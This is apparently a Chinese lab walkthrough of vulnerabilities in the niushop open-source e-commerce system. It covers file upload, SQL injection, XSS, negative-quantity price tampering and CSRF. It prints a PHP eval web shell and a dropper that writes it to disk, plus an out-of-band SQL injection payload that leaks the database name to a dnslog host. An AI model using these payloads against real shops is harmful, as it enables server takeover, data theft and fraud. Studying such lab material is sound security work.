niushop开源商城靶场漏洞

文件上传漏洞

先注册一个账号

来到个人信息修改个人头像

选择我们的马

#一句话(不想麻烦的选择一句话也可以)

<?php @eval($_POST["cmd"]);?>

#生成h.php文件

<?php

fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>');

?>

在BP中进行抓包,改为1.php

右键图片在网页新建打开图片标签;就能获取路径

去蚁剑连接生成的h.php就行

SQL注入漏洞

我们查看后台寻找功能点发现有一个地方可以执行 sql 命令

我们输入一个 sql 语句

发现没有回显,这时我们可以考虑使用外带注入

(select load_file(concat('\\\\',(select (database())),'96toab.dnslog.cn.dnslog.cn\\abc')))

得到数据库的名字为 niushop_b2c

获取表名

XSS漏洞

后台-->设置-->基础设置-->商城第三方统计代码

来到首页就会弹窗

0元购

在商品页面抓包

通过改变数量改变价格

在放行一次修改数量为-1

后面全部放行就OK了

CSRF漏洞

下载源码;制作添加管理员链接

添加管理员用户

BP抓包;制作SCRF

复制下来制作链接

admin管理员在已登录的状态点击我们的链接

相关推荐
在肯德基吃麻辣烫7 小时前
使用开源在线聊天工具Fiora轻松搭建个性化聊天平台在线交流
开源
是小崔啊7 小时前
开源轮子 - EasyExcel01(核心api)
java·开发语言·开源·excel·阿里巴巴
洛阳泰山9 小时前
MaxKB基于大语言模型和 RAG的开源知识库问答系统的快速部署教程
人工智能·语言模型·开源·rag·maxkb
华为云开发者联盟11 小时前
开源for Huawei,Beam适配GaussDB实践案例分享
java·数据库·开源·华为云gaussdb(dws)·华为云gaussdb(dws)·beam
Kiros_Jiang14 小时前
开源低代码平台-Microi吾码 打印引擎使用
javascript·开源·json·.net·pip
dami_king15 小时前
项目开源能够带来什么?从中得到了什么?
开源·gitlab·github
that's boy16 小时前
突围边缘:OpenAI开源实时嵌入式API,AI触角延伸至微观世界
人工智能·gpt·chatgpt·开源·openai·midjourney
AirDroid_qs16 小时前
Niushop开源商城(漏洞复现)
android·网络安全·开源
奥顺互联V16 小时前
一次性部署:使用Docker部署PHP应用
大数据·mysql·开源·php